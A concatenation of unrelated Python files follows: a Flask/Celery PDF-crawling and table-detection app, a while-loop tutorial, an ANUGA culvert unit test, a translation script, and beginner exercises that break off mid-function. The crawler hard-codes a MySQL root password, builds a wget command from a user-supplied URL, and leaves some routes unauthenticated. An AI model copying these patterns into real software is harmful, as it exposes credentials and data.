# Celery configuration
app.config['CELERY_BROKER_URL'] = 'redis://localhost:6379/0'
app.config['CELERY_RESULT_BACKEND'] = 'redis://localhost:6379/0'
# SocketIO
socketio = SocketIO(app, async_mode=async_mode)
# Lock to limit app to a single user
lock = Lock()
# Initialize Celery
celery = Celery(app.name, broker=app.config['CELERY_BROKER_URL'])
celery.conf.update(app.config)
# Config MySQL
app.config['MYSQL_HOST'] = 'localhost'
app.config['MYSQL_USER'] = 'root'
app.config['MYSQL_PASSWORD'] = 'mountain'
app.config['MYSQL_DB'] = 'bar'
app.config['MYSQL_CURSORCLASS'] = 'DictCursor'
# Init MySQL
mysql = MySQL(app)
# ----------------------------- CELERY TASKS --------------------------------------------------------------------------
# Background task in charge of crawling
@celery.task(bind=True) # time_limit=MAX_CRAWLING_DURATION other possibility
def crawling_task(self, url='', post_url='', domain='',
max_crawl_duration=MAX_CRAWLING_DURATION, max_crawl_size=MAX_CRAWL_SIZE,
max_crawl_depth=MAX_CRAWL_DEPTH):
# STEP 1: Start the wget subprocess
command = shlex.split("timeout %d wget -r -l %d -A pdf %s" % (max_crawl_duration, max_crawl_depth, url,))
# Note: Consider using --wait flag, takes longer to download but less aggressive crawled server
# https://www.gnu.org/software/wget/manual/wget.html#Recursive-Download
# Note: Using timeout is not necessary, but serves as safety, as wget should be used with caution.
process = subprocess.Popen(command, cwd=WGET_DATA_PATH, stderr=subprocess.PIPE)
# Set the pid in the state in order to be able to cancel subprocess anytime
# Note: one could also cancel the celery task which then should kill its subprocess, but again I prefer option one
self.update_state(state='PROGRESS', meta={'pid': process.pid, })
# STEP 2: send crawl stderr through WebSocket and save in logfile
with open(WGET_LOG_PATH, "a") as logfile:
while True:
try:
next_line = process.stderr.readline()
# Added try/catch after bug that appears when visiting (because of apostrophe "’"):
# https://www.edi.admin.ch/edi/it/home/fachstellen/ara/domande-e-risposte/Il-SLR-usa-la-definizione-di-antisemitismo-dell%E2%80%99IHRA.html
# Noticed by Jean-Luc.
decoded_line = next_line.decode(encoding='utf-8')
post(post_url, json={'event': 'crawl_update', 'data': decoded_line})
logfile.write(decoded_line)
except UnicodeDecodeError as e:
# Catch Decoding error.
print("UnicodeDecodeError: " + str(e) + " The bytes trying to get decoded were: " + next_line.hex())
if process.poll() is not None:
# Subprocess is finished
print("Crawling task has successfully terminated.")
break
crawled_size = dir_size(WGET_DATA_PATH + "/" + domain)
if crawled_size is not None and crawled_size > max_crawl_size:
# Threshold reached
print("Crawling task terminated, threshold was reached")
break
# STEP 3: Kill the subprocess if still alive at this poing
if process.poll() is None:
os.kill(process.pid, signal.SIGTERM)
# STEP 4: Return the exit code
output = process.communicate()[0]
exitCode = process.returncode
# STEP 5: redirect user to crawling end options.
post(post_url, json={'event': 'redirect', 'data': {'url': '/crawling/autoend'}})
# TODO consider releasing lock here
return exitCode
# Background task in charge of performing table detection on a single pdf
@celery.task(bind=True)
def tabula_task(self, file_path='', post_url=''):
# STEP 0: check if file is already in db
url = file_path[(len(WGET_DATA_PATH) + 1):]
try:
with app.app_context():
# Create cursor
cur = mysql.connection.cursor()
# Get Crawls
result = cur.execute("""SELECT fid, stats FROM Files WHERE url=%s""", (url,))
file = cur.fetchone()
# If there was a result then return stats directly
# TODO time limit on how long ago pdf was processed?
if result > 0:
stats = json.loads(file['stats'])
# Communicate success to client in a broadcasting manner
post(post_url, json={'event': 'tabula_success', 'data': {'data': 'Processing time saved, document was '
'already processed '
'at an earlier time: ',
'pages': stats['n_pages'], 'tables': stats['n_tables']}})
return file['fid']
except Exception as e:
# Communicate failure to client
post(post_url, json={'event': 'processing_failure', 'data': {'pdf_name': file_path,
'text': 'PyPDF error on file : ',
'trace': str(e)}})
return -1
# STEP 1: Otherwise proceed, set all counters to 0
n_tables = 0
n_table_rows = 0
table_sizes = {'small': 0, 'medium': 0, 'large': 0}
# STEP 2: count total number of pages by reading PDF
try:
pdf_file = PyPDF2.PdfFileReader(open(file_path, mode='rb'))
n_pages = pdf_file.getNumPages()
except Exception as e:
# Communicate failure to client
post(post_url, json={'event': 'processing_failure', 'data': {'pdf_name': file_path,
'text': 'PyPDF error on file : ',
'trace': str(e)}})
return -1
# STEP 3: run TABULA to extract all tables into one pandas data frame
try:
df_array = tabula.read_pdf(file_path, pages="all", multiple_tables=True)
except Exception as e:
# Communicate failure to client
post(post_url, json={'event': 'processing_failure', 'data': {'pdf_name': file_path,
'text': 'Tabula error on file : ',
'trace': str(e)}})
return -1
# STEP 4: count number of rows in each data frame
for df in df_array:
rows = df.shape[0]
n_table_rows += rows
n_tables += 1
# Add table stats
if rows <= SMALL_TABLE_LIMIT:
table_sizes['small'] += 1
elif rows <= MEDIUM_TABLE_LIMIT:
table_sizes['medium'] += 1
else:
table_sizes['large'] += 1
# STEP 5: save stats as intermediary results in db
try:
creation_date = pdf_file.getDocumentInfo()['/CreationDate']
stats = {'n_pages': n_pages, 'n_tables': n_tables,
'n_table_rows': n_table_rows, 'creation_date': creation_date,
'table_sizes': table_sizes}
with app.app_context():
# Create cursor
cur = mysql.connection.cursor()
# Execute query
cur.execute("""INSERT INTO Files(url, stats) VALUES(%s, %s)""",
(url, json.dumps(stats, sort_keys=True, indent=4)))
# Get ID from inserted row
insert_id = cur.lastrowid
# Commit to DB
mysql.connection.commit()
# Close connection
cur.close()
except Exception as e:
# Communicate failure to client
post(post_url, json={'event': 'processing_failure', 'data': {'pdf_name': file_path,
'text': 'Cannot save stats of file in db : ',
'trace': str(e)}})
return -1
# STEP 6: Send success message to client
post(post_url, json={'event': 'tabula_success', 'data': {'data': 'Tabula PDF success: ',
'pages': n_pages, 'tables': n_tables}})
# STEP 7: Return db row id
return insert_id
# Background task serving as callback to save metadata to db
@celery.task(bind=True)
def pdf_stats(self, tabula_list, domain='', url='', crawl_total_time=0, post_url='', processing_start_time=0):
with app.app_context():
# STEP 0: Time keeping
path = "data/%s" % (domain,)
# STEP 1: Call Helper function to create Json string
# https://stackoverflow.com/questions/35959580/non-ascii-file-name-issue-with-os-walk works
# https://stackoverflow.com/questions/2004137/unicodeencodeerror-on-joining-file-name doesn't work
hierarchy_dict = path_dict(path) # adding ur does not work as expected either
hierarchy_json = json.dumps(hierarchy_dict, sort_keys=True, indent=4) #encoding='cp1252' not needed in python3
# STEP 2: Call helper function to count number of pdf files
n_files = path_number_of_files(path)
# STEP 3: Treat result from Tabula tasks
n_success = 0
n_errors = 0
fid_set = set()
for fid in tabula_list:
if fid < 0:
n_errors += 1
else:
n_success += 1
fid_set.add(fid)
# STEP 4: Save some additional stats
disk_size = dir_size(WGET_DATA_PATH + "/" + domain)
# STEP 5: compute final processing time
processing_total_time = time.time() - processing_start_time
# STEP 5: Save query in DB
# Create cursor
cur = mysql.connection.cursor()
# Execute query
cur.execute("""INSERT INTO Crawls(pdf_crawled, pdf_processed, process_errors, domain, disk_size,
url, hierarchy, crawl_total_time, proc_total_time)
VALUES(%s ,%s, %s, %s, %s, %s, %s, %s, %s)""",
(n_files, n_success, n_errors, domain, disk_size, url, hierarchy_json,
crawl_total_time, processing_total_time))
# Commit to DB
mysql.connection.commit()
# Get Crawl ID
cid = cur.lastrowid
# STEP 6: link all pdf files to this query
insert_tuples = [(fid, cid) for fid in fid_set]
cur.executemany("""INSERT INTO Crawlfiles(fid, cid) VALUES (%s, %s)""",
insert_tuples)
# Commit to DB
mysql.connection.commit()
# Close connection
cur.close()
# Send success message asynchronously to clients
post(post_url, json={'event': 'redirect', 'data': {'url': '/processing'}})
return 'success'
# ----------------------------- HELPER FUNCTIONS ----------------------------------------------------------------------
# Wrapper to check if user logged in
def is_logged_in(f):
@wraps(f)
def wrap(*args, **kwargs):
if 'logged_in' in session:
return f(*args, **kwargs)
else:
flash('Unauthorized, Please login', 'danger')
return redirect(url_for('login'))
return wrap
# Ability to stream a template (can be used with python generator, was now replaced by flask-socketio interface)
def stream_template(template_name, **context):
app.update_template_context(context)
t = app.jinja_env.get_template(template_name)
rv = t.stream(context)
rv.disable_buffering()
return rv
# ----------------------------- APP ROUTES ----------------------------------------------------------------------------
# Crawl from to check user input
class CrawlForm(Form):
url = StringField('URL', [validators.Length(min=4, max=300)], default=DEFAULT_CRAWL_URL)
depth = IntegerField('Max Crawl Depth', [validators.NumberRange(min=1, max=10)], default=MAX_CRAWL_DEPTH)
time = IntegerField('Max Crawl Duration [Minutes]', [validators.NumberRange(min=1, max=1000)],
default=int(MAX_CRAWLING_DURATION / 60))
size = IntegerField('Max Crawl Size [MBytes]', [validators.NumberRange(min=10, max=1000)], default=MB_CRAWL_SIZE)
pdf = IntegerField('Max Number of PDF to be processed', [validators.NumberRange(min=0, max=10000)],
default=PDF_TO_PROCESS)
# Index
@app.route('/', methods=['GET', 'POST'])
def index():
form = CrawlForm(request.form)
if request.method == 'POST' and form.validate():
# Change global variables depending on input
global MAX_CRAWLING_DURATION, MAX_CRAWL_DEPTH, MAX_CRAWL_SIZE, MB_CRAWL_SIZE, PDF_TO_PROCESS
# Get Form Fields and update variables
url = form.url.data
crawl_again = request.form['crawl_again']
MAX_CRAWL_DEPTH = form.depth.data
MB_CRAWL_SIZE = form.size.data
MAX_CRAWL_SIZE = 1024 * 1024 * MB_CRAWL_SIZE
MAX_CRAWLING_DURATION = form.time.data * 60
PDF_TO_PROCESS = form.pdf.data
# Check if valid URL with function in helper module
status_code = url_status(url)
if status_code == -1:
flash('Impossible to establish contact to given URL, check for typos and format.', 'danger')
return render_template('home.html', most_recent_url="none", form=form)
elif status_code is not requests.codes.ok:
flash('Contact to given url was established, but received back the following status code: '
+ str(status_code) + '. (Only status code 200 is accepted at the moment)', 'danger')
return render_template('home.html', most_recent_url="none", form=form)
# Extract domain name out of url and save in session
parsed = urlparse(url)
domain = parsed.netloc
session['domain'] = domain
session['url'] = url
# Check if stats already exist about this domain
# Create cursor
cur = mysql.connection.cursor()
# Get highest crawl_id from the last 7 days
result = cur.execute("""SELECT COALESCE(MAX(cid), 0) as cid FROM Crawls WHERE domain = %s
AND (crawl_date > DATE_SUB(now(), INTERVAL %s DAY))""", (domain, CRAWL_REPETITION_WARNING_TIME))
cid = cur.fetchone()["cid"]
# Closing cursor apparently not needed when using this extension
if crawl_again != "True" and cid != 0:
# There was a previous crawl, make button appear to view corresponding stats
flash("This domain was already crawled in the last " + str(CRAWL_REPETITION_WARNING_TIME) + " days, "
+ "you have the option to directly view the most recent statistics or restart the crawling process.",
"info")
return render_template('home.html', most_recent_url=url_for("cid_statistics", cid=cid), form=form)
return redirect(url_for('crawling'))
return render_template('home.html', most_recent_url="none", form=form)
# Crawling
@app.route('/crawling')
@is_logged_in
def crawling():
# Check no crawling in progress
if not lock.acquire(False):
# Failed to lock the resource
flash(Markup('There are already Tasks scheduled, please wait before running another query or '
'terminate all running processes <a href="/advanced" class="alert-link">here.</a>'), 'danger')
return redirect(url_for('index'))
else:
try:
# delete previously crawled data
delete_data()
# STEP 0: TimeKeeping
session['crawl_start_time'] = time.time()
# STEP 1: Prepare WGET command
url = session.get('url', None)
post_url = url_for('event', _external=True)
# STEP 2: Schedule celery task
result = crawling_task.delay(url=url, post_url=post_url, domain=session.get('domain', ''),
max_crawl_duration=MAX_CRAWLING_DURATION,
max_crawl_depth=MAX_CRAWL_DEPTH,
max_crawl_size=MAX_CRAWL_SIZE)
session['crawling_id'] = result.id
return render_template('crawling.html',
max_crawling_duration=MAX_CRAWLING_DURATION,
max_crawl_depth=MAX_CRAWL_DEPTH,
max_crawl_size=MAX_CRAWL_SIZE)
except Exception as e:
# Call Terminate function to make sure all started tasks are terminated and lock released
terminate()
flash("An error occurred : " + str(e), 'danger')
return redirect(url_for('index'))
# End Crawling manually
@app.route('/crawling/end')
@is_logged_in
def end_crawling():
# STEP 0: check crawling process exists
if session.get('crawling_id', 0) is 0:
flash("There is no crawling process to kill", 'danger')
return redirect(url_for('index'))
# STEP 1: Kill only subprocess, and the celery process will then recognize it and terminate too
celery_id = session.get('crawling_id', 0) # get saved celery task id
try:
# This is a hack to kill the spawned subprocess and not only the celery task
# I read that in some cases the subprocess doesn't get terminated when the Celery task is revoked,
# though I never observed this behavior.
pid = crawling_task.AsyncResult(celery_id).info.get('pid') # get saved subprocess id
os.kill(pid, signal.SIGTERM) # kill subprocess
except AttributeError:
flash("Either the task was not scheduled yet, is already over, or was interrupted from someone else"
" and thus interruption is not possible", 'danger')
return redirect(url_for('index'))
# STEP 2: TimeKeeping
crawl_start_time = session.get('crawl_start_time', None)
session['crawl_total_time'] = time.time() - crawl_start_time
# STEP 3: Successful interruption
session['crawling_id'] = 0 # remove crawling id
flash('You successfully manually interrupted the crawler.', 'success')
# STEP 4: Release Lock
try:
lock.release()
except RuntimeError:
pass
return render_template('end_crawling.html')
# End Crawling automatically, for this to work the client must still have the tab open !
@app.route('/crawling/autoend')
@is_logged_in
def autoend_crawling():
# STEP 1: TimeKeeping
crawl_start_time = session.get('crawl_start_time', None)
total_time = time.time() - crawl_start_time
session['crawl_total_time'] = total_time
crawled_size = dir_size(WGET_DATA_PATH + "/" + session.get('domain'))
# STEP 2: Successful interruption
if total_time > MAX_CRAWLING_DURATION:
flash('Time limit reached - Crawler interrupted automatically', 'success')
elif crawled_size > MAX_CRAWL_SIZE:
flash("Size limit reached - Crawler interrupted automatically", 'success')
else:
flash("Crawled all PDFs until depth of " + str(MAX_CRAWL_DEPTH) + " - Crawler interrupted automatically",
'success')
session['crawling_id'] = 0 # remove crawling id
# STEP 3: Release Lock
try:
lock.release()
except RuntimeError:
pass
return redirect(url_for("table_detection"))
# Start table detection
@app.route('/table_detection')
@is_logged_in
def table_detection():
# First check if lock can be acquired
if not lock.acquire(False):
# Failed to lock the resource
flash(Markup('There are already Tasks scheduled, please wait before running another query or '
'terminate all running processes <a href="/advanced" class="alert-link">here.</a>'), 'danger')
return redirect(url_for('index'))
else:
try:
# Step 0: take start time and prepare arguments
processing_start_time = time.time()
domain = session.get('domain', None)
url = session.get('url', None)
crawl_total_time = session.get('crawl_total_time', 0)
post_url = url_for('event', _external=True)
path = WGET_DATA_PATH + '/' + domain
count = 0
file_array = []
# STEP 1: Find PDF we want to process
for dir_, _, files in os.walk(path):
for fileName in files:
if ".pdf" in fileName and count < PDF_TO_PROCESS:
rel_file = os.path.join(dir_, fileName)
file_array.append(rel_file)
count += 1
# STEP 2: Prepare a celery task for every pdf and then a callback to store result in db
header = (tabula_task.s(f, post_url) for f in file_array)
callback = pdf_stats.s(domain=domain, url=url, crawl_total_time=crawl_total_time, post_url=post_url,
processing_start_time=processing_start_time)
# STEP 3: Run the celery Chord
chord(header)(callback)
# STEP 4: If query was empty go straight further
if count == 0:
return redirect(url_for('processing'))
return render_template('table_detection.html', total_pdf=count)
except Exception as e:
# If something goes wrong make sure all tasks get revoked and lock released
terminate()
flash("Something went wrong: " + str(e) + " --- All tasks were revoked and the lock released")
# End of PDF processing (FIXME name not very fitting anymore)
@app.route('/processing')
@is_logged_in
def processing():
# Release lock
try:
lock.release()
except RuntimeError:
pass
return render_template('processing.html', domain=session.get('domain', ''), )
# Last Crawl Statistics
@app.route('/statistics')
def statistics():
# Create cursor
cur = mysql.connection.cursor()
# Get user by username
cur.execute("""SELECT cid FROM Crawls WHERE crawl_date = (SELECT max(crawl_date) FROM Crawls)""")
result = cur.fetchone()
# Close connection
cur.close()
if result:
cid_last_crawl = result["cid"]
return redirect(url_for("cid_statistics", cid=cid_last_crawl))
else:
flash("There are no statistics to display, please start a new query and wait for it to complete.", "danger")
return redirect(url_for("index"))
# CID specific Statistics
@app.route('/statistics/<int:cid>')
def cid_statistics(cid):
# STEP 1: retrieve all saved stats from DB
# Create cursor
cur = mysql.connection.cursor()
cur.execute("""SELECT * FROM Crawls WHERE cid = %s""", (cid,))
crawl = cur.fetchone()
# Get stats by getting all individual files
cur.execute("""SELECT url, stats FROM Files f JOIN Crawlfiles cf ON f.fid = cf.fid WHERE cid = %s""",
(cid,))
stats_db = cur.fetchall()
stats = {}
for stat in stats_db:
stats[stat['url']] = json.loads(stat['stats'])
# Close connection
cur.close()
# STEP 2: do some processing to retrieve interesting info from stats
json_hierarchy = json.loads(crawl['hierarchy'])
stats_items = stats.items()
n_tables = sum([subdict['n_tables'] for filename, subdict in stats_items])
n_rows = sum([subdict['n_table_rows'] for filename, subdict in stats_items])
n_pages = sum([subdict['n_pages'] for filename, subdict in stats_items])
medium_tables = sum([subdict['table_sizes']['medium'] for filename, subdict in stats_items])
small_tables = sum([subdict['table_sizes']['small'] for filename, subdict in stats_items])
large_tables = sum([subdict['table_sizes']['large'] for filename, subdict in stats_items])
# Find some stats about creation dates
creation_dates_pdf = [subdict['creation_date'] for filename, subdict in stats_items]
creation_dates = list(map(lambda s: pdf_date_format_to_datetime(s), creation_dates_pdf))
disk_size = round(crawl['disk_size'] / (1024*1024), 1)
if len(creation_dates) > 0:
oldest_pdf = min(creation_dates)
most_recent_pdf = max(creation_dates)
else:
oldest_pdf = "None"
most_recent_pdf = "None"
return render_template('statistics.html', cid=cid, n_files=crawl['pdf_crawled'], n_success=crawl['pdf_processed'],
n_tables=n_tables, n_rows=n_rows, n_errors=crawl['process_errors'], domain=crawl['domain'],
small_tables=small_tables, medium_tables=medium_tables,
large_tables=large_tables, stats=json.dumps(stats, sort_keys=True, indent=4),
hierarchy=json_hierarchy, end_time=crawl['crawl_date'],
crawl_total_time=round(crawl['crawl_total_time'] / 60.0, 1),
proc_total_time=round(crawl['proc_total_time'] / 60.0, 1),
oldest_pdf=oldest_pdf, most_recent_pdf=most_recent_pdf, disk_size=disk_size,
n_pages=n_pages)
# Form to check User registration data
class RegisterForm(Form):
name = StringField('Name', [validators.Length(min=1, max=50)])
username = StringField('Username', [validators.Length(min=4, max=25)])
email = StringField('Email', [validators.Length(min=6, max=50)])
password = PasswordField('Password', [validators.DataRequired(),
validators.EqualTo('confirm', message='Passwords do not match')])
confirm = PasswordField('Confirm Password')
# Register
@app.route('/register', methods=['GET', 'POST'])
def register():
form = RegisterForm(request.form)
if request.method == 'POST' and form.validate():
name = form.name.data
email = form.email.data
username = form.username.data
password = sha256_crypt.encrypt(str(form.password.data))
# Create cursor
cur = mysql.connection.cursor()
# Execute query
cur.execute("""INSERT INTO Users(name, email, username, password) VALUES(%s, %s, %s, %s)""",
(name, email, username, password))
# Commit to DB
mysql.connection.commit()
# Close connection
cur.close()
flash('You are now registered and can log in', 'success')
return redirect(url_for('login'))
return render_template('register.html', form=form)
# User login
@app.route('/login', methods=['GET', 'POST'])
def login():
if request.method == 'POST':
# Get Form Fields
username = request.form['username']
password_candidate = request.form['password']
# Create cursor
cur = mysql.connection.cursor()
# Get user by username
result = cur.execute("""SELECT * FROM Users WHERE username = %s""", [username])
# Note: apparently this is safe from SQL injections see
# https://stackoverflow.com/questions/7929364/python-best-practice-and-securest-to-connect-to-mysql-and-execute-queries/7929438#7929438
if result > 0:
# Get stored hash
data = cur.fetchone() # FIXME username should be made primary key
password = data['password']
# Compare passwords
if sha256_crypt.verify(password_candidate, password):
# Check was successful -> create session variables
session['logged_in'] = True
session['username'] = username
flash('You are now logged in', 'success')
return redirect(url_for('index'))
else:
error = 'Invalid login'
return render_template('login.html', error=error)
else:
error = 'Username not found'
return render_template('login.html', error=error)
# Note: Closing connection not necessary when using flask mysql db extension
return render_template('login.html')
# Delete Crawl
@app.route('/delete_crawl', methods=['POST'])
@is_logged_in
def delete_crawl():
try:
# Get Form Fields
cid = request.form['cid']
# Create cursor
cur = mysql.connection.cursor()
# Get user by username
cur.execute("""DELETE FROM Crawls WHERE cid = %s""", (cid,))
# Commit to DB
mysql.connection.commit()
# Close connection
cur.close()
flash('Crawl successfully removed', 'success')
return redirect(url_for('dashboard'))
except Exception as e:
flash('An error occurred while trying to delete the crawl: ' + str(e), 'danger')
redirect(url_for('dashboard'))
# Logout
@app.route('/logout')
@is_logged_in
def logout():
session.clear()
flash('You are now logged out', 'success')
return redirect(url_for('login'))
# Dashboard
@app.route('/dashboard')
def dashboard():
# Create cursor
cur = mysql.connection.cursor()
# Get Crawls
result = cur.execute("""SELECT cid, crawl_date, pdf_crawled, pdf_processed, domain, url FROM Crawls""")
crawls = cur.fetchall()
if result > 0:
return render_template('dashboard.html', crawls=crawls)
else:
msg = 'No Crawls Found'
return render_template('dashboard.html', msg=msg)
# Advanced
@app.route('/advanced')
@is_logged_in
def advanced():
return render_template('advanced.html')
# Release lock and Terminate all background tasks
@app.route('/terminate')
@is_logged_in
def terminate():
# Purge all tasks from task queue
command = shlex.split(VIRTUALENV_PATH + " -f -A bar.celery purge") #FIXME datapath variable
subprocess.Popen(command)
# Kill all Celery tasks that have an ETA or are scheduled for later processing
i = celery.control.inspect()
scheduled_tasks = i.scheduled()
# FIXME don't replicate same code 3 times
for workers in scheduled_tasks:
for j in range(0, len(scheduled_tasks[workers])):
celery.control.revoke(scheduled_tasks[workers][j]['id'], terminate=True)
# Kill all Celery tasks that are currently active.
active_tasks = i.active()
for workers in active_tasks:
for j in range(0, len(active_tasks[workers])):
celery.control.revoke(active_tasks[workers][j]['id'], terminate=True)
# Kill all Celery tasks that have been claimed by workers
reserved_tasks = i.reserved()
for workers in reserved_tasks:
for j in range(0, len(reserved_tasks[workers])):
celery.control.revoke(reserved_tasks[workers][j]['id'], terminate=True)
# Release Lock if locked
try:
lock.release()
except RuntimeError:
pass
# Broadcast the termination messages to users that were potentially still observing task progress
socketio.emit('redirect', {'url': 'terminated'})
# Flash success message
flash("All processes were interrupted and the lock released !", 'success')
return redirect(url_for('advanced'))
# Page displayed when process terminated by other user
@app.route('/terminated')
@is_logged_in
def terminated():
return render_template('terminated.html')
# Empty all Tables except for User data
@app.route('/empty_tables')
@is_logged_in
def empty_tables():
# Create cursor
cur = mysql.connection.cursor()
# Truncate all tables, necessary trick because of constrained table
# https://stackoverflow.com/questions/5452760/how-to-truncate-a-foreign-key-constrained-table
cur.execute("""SET FOREIGN_KEY_CHECKS = 0""")
cur.execute("""TRUNCATE TABLE Crawlfiles""")
cur.execute("""TRUNCATE TABLE Crawls""")
cur.execute("""TRUNCATE TABLE Files""")
cur.execute("""SET FOREIGN_KEY_CHECKS = 1""")
# Close connection
cur.close()
flash("All tables were emptied !", 'success')
return redirect(url_for('advanced'))
# About
@app.route('/about')
def about():
return render_template('about.html')
# Delete Crawled PDFs
@app.route('/delete_data', methods=['GET', 'POST'])
@is_logged_in
def delete_data():
# Taken from https://stackoverflow.com/questions/185936/how-to-delete-the-contents-of-a-folder-in-python
folder = WGET_DATA_PATH
for the_file in os.listdir(folder):
file_path = os.path.join(folder, the_file)
try:
if os.path.isfile(file_path):
os.unlink(file_path)
elif os.path.isdir(file_path): shutil.rmtree(file_path)
except Exception as e:
print(e)
return "Crawled data deleted successfully"
# Download JSON hierarchy
@app.route('/hierarchy/<int:cid>')
@is_logged_in
def hierarchy_download(cid):
# Get JSON string
# Create cursor
cur = mysql.connection.cursor()
# Get Crawls
result = cur.execute("""SELECT hierarchy FROM Crawls WHERE cid = %s""", (cid,))
if not result > 0:
return
hierarchy = cur.fetchone()['hierarchy']
return Response(hierarchy,
mimetype='application/json',
headers={'Content-Disposition': 'attachment;filename=hierarchy.json'})
# Download any logfile
@app.route('/log/<string:lid>')
@is_logged_in
def log_download(lid):
if lid in switcher:
return send_file(switcher.get(lid))
else:
flash('An error occurred while trying to download log', 'error')
return redirect(url_for('advanced'))
# Delete any logfile
@app.route('/log_del/<string:lid>')
@is_logged_in
def log_delete(lid):
if lid in switcher:
open(switcher.get(lid), 'w').close()
flash('Log was successfully emptied', 'success')
return redirect(url_for('advanced'))
else:
flash('An error occurred while trying to delete log', 'error')
return redirect(url_for('advanced'))
# Used to easily emit WebSocket messages from inside tasks
# Pattern taken from https://github.com/jwhelland/flask-socketio-celery-example/blob/master/app.py
@app.route('/event/', methods=['POST'])
def event():
data = request.json
if data:
socketio.emit(data['event'], data['data'])
return 'ok'
return 'error', 404
# ----------------------------- ASYNCHRONOUS COMMUNICATION ------------------------------------------------------------
# Note: these are not crucial at the moment,
# though it would be nice to direct messages to clients instead of broadcasting.
@socketio.on('connect')
def test_connect():
emit('my_response', {'data': 'Connected', 'count': 0})
@socketio.on('disconnect')
def test_disconnect():
print('Client disconnected', request.sid)
# ----------------------------- RUNNING APPLICATION -------------------------------------------------------------------
if __name__ == '__main__':
socketio.run(app)
|
# while loop if the condition is true it will continuously executing the loop.
# it will continuously execute the loop until the condition becomes false.
s = 4
while s > 1:
print(s)
s = s - 1 # it is required to avoid the infinite loop
print("first while loop execution is done")
# if you don't want to print some no to be printed
t = 5
while t > 1:
if t != 3:
print(t)
t = t - 1
print('second while loop execution is done')
# Break: it is used to break the entire while loop if certain condition is true
# it mostly used to check the certain element in the list.
u = 10
while u > 1:
if u == 7:
break
print(u)
u = u - 1
print('third while loop execution is done')
# Continue: it is used when you want to skip the current iteration and proceed to next iteration
# we can put multiple if condition in while loop
v = 10
while v > 1:
if v == 9:
v = v - 1 # it is used so that it will not go for infinite loop
# like if you find 9 it will stuck there because we are not decrease the value.
# it will skip the iteration of 9 and doen't print that.
continue
if v == 6:
break
print(v)
v = v - 1
print('fourth while loop execution is done') |
#!/usr/bin/env python
from anuga.culvert_flows.culvert_polygons import *
import unittest
import os.path
from anuga.geometry.polygon import inside_polygon, polygon_area
class Test_poly(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_1(self):
end_point0=[307138.813,6193474]
end_point1=[307150.563,6193469]
width=3
height=3
number_of_barrels=1
P = create_culvert_polygons(end_point0,
end_point1,
width=width,
height=height,
number_of_barrels=number_of_barrels)
# Compute area and check that it is greater than 0
for key1 in ['exchange_polygon0',
'exchange_polygon1']:
polygon = P[key1]
area = polygon_area(polygon)
msg = 'Polygon %s ' %(polygon)
msg += ' has area = %f' % area
assert area > 0.0, msg
for key2 in ['enquiry_point0', 'enquiry_point1']:
point = P[key2]
assert len(inside_polygon(point, polygon)) == 0
def test_2(self):
#end_point0=[307138.813,6193474]
#end_point1=[307150.563,6193469]
end_point0=[10., 5.]
end_point1=[10., 10.]
width = 1
height = 3.5
number_of_barrels=1
P = create_culvert_polygons(end_point0,
end_point1,
width=width,
height=height,
number_of_barrels=number_of_barrels)
# Compute area and check that it is greater than 0
for key1 in ['exchange_polygon0',
'exchange_polygon1']:
polygon = P[key1]
area = polygon_area(polygon)
msg = 'Polygon %s ' % (polygon)
msg += ' has area = %f' % area
assert area > 0.0, msg
for key2 in ['enquiry_point0', 'enquiry_point1']:
point = P[key2]
assert len(inside_polygon(point, polygon)) == 0
#-------------------------------------------------------------
if __name__ == "__main__":
suite = unittest.makeSuite(Test_poly, 'test')
runner = unittest.TextTestRunner()
runner.run(suite)
|
#!/usr/bin/python3
"""Translate messages.json using Google Translate.
The `trans` tool can be found here:
https://www.soimort.org/translate-shell/
or on Debian systems:
$ sudo apt-get install translate-shell
"""
import collections
import json
import os
import shutil
import subprocess
import sys
LANG_MAP = {
'ar': 'arabic',
'bg': 'Bulgarian',
'ca': 'Catalan',
'cs': 'Czech',
'da': 'Danish',
'de': 'german',
'el': 'Greek',
'es': 'spanish',
'es_419': 'spanish',
'et': 'Estonian',
'fa': 'Persian',
'fi': 'finnish',
'fil': 'tgl',
'fr': 'french',
'he': 'Hebrew',
'hi': 'Hindi',
'hr': 'Croatian',
'hu': 'Hungarian',
'id': 'Indonesian',
'it': 'italian',
'ja': 'japanese',
'ko': 'Korean',
'lt': 'Lithuanian',
'lv': 'Latvian',
'ms': 'Malay',
'nl': 'Dutch',
'no': 'Norwegian',
'pl': 'Polish',
'pt_BR': 'pt',
'pt_PT': 'Portuguese',
'ro': 'Romanian',
'ru': 'Russian',
'sk': 'Slovak',
'sl': 'Slovenian',
'sr': 'sr-Cyrl',
'sv': 'Swedish',
'th': 'Thai',
'tr': 'Turkish',
'uk': 'Ukrainian',
'vi': 'Vietnamese',
'zh_CN': 'zh-CN',
'zh_TW': 'zh-TW',
}
def load(lang):
with open('%s/messages.json' % lang) as fp:
return json.JSONDecoder(object_pairs_hook=collections.OrderedDict).decode(fp.read())
def trans_one(lang, msg):
return subprocess.check_output(
['trans', '-b', '-s', 'en', '-t', LANG_MAP[lang], msg]).decode('utf-8').strip()
def trans(lang, en_data, data):
ret = data.copy()
for k in en_data.keys():
if k not in data:
ret[k] = d = collections.OrderedDict()
d['message'] = trans_one(lang, en_data[k]['message'])
d['description'] = en_data[k]['description']
return ret
def format(data):
return json.dumps(data, ensure_ascii=False, indent=2)
def save(lang, data):
print('saving: %s' % lang)
path = '%s/messages.json' % lang
with open(path + '.tmp', 'w') as fp:
fp.write(format(data))
shutil.move(path + '.tmp', path)
def main(argv):
root = os.path.join(os.path.dirname(os.path.realpath(__file__)),
'_locales')
os.chdir(root)
en_data = load('en')
#shutil.copy('en/messages.json', 'en_GB/messages.json')
for lkey, lname in LANG_MAP.items():
if not lname:
print('unknown lang: %s' % lkey)
continue
print('checking', lname)
data = load(lkey)
new_data = trans(lkey, en_data, data)
if data != new_data:
save(lkey, new_data)
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
|
# ********************************************************************
# Countdown - Create a function that accepts a number as an input. Return a new list that counts down by one,
# from the number (as the 0th element) down to 0 (as the last element).
# Example: countdown(5) should return [5,4,3,2,1,0]
def countdown(num):
new_list = []
for count in range (num, -1 , -1):
new_list.append(count)
return new_list
print(countdown(5))
# Print and Return - Create a function that will receive a list with two numbers. Print the first value and return the second.
# Example: print_and_return([1,2]) should print 1 and return 2
def print_return(list):
print (list[0])
return list[1]
print(print_return([2,3]))
# First Plus Length - Create a function that accepts a list and returns the sum of the first value in the list plus the list's length.
# Example: first_plus_length([1,2,3,4,5]) should return 6 (first value: 1 + length: 5)
def first_p_length(list):
j= (list[0] + len(list))
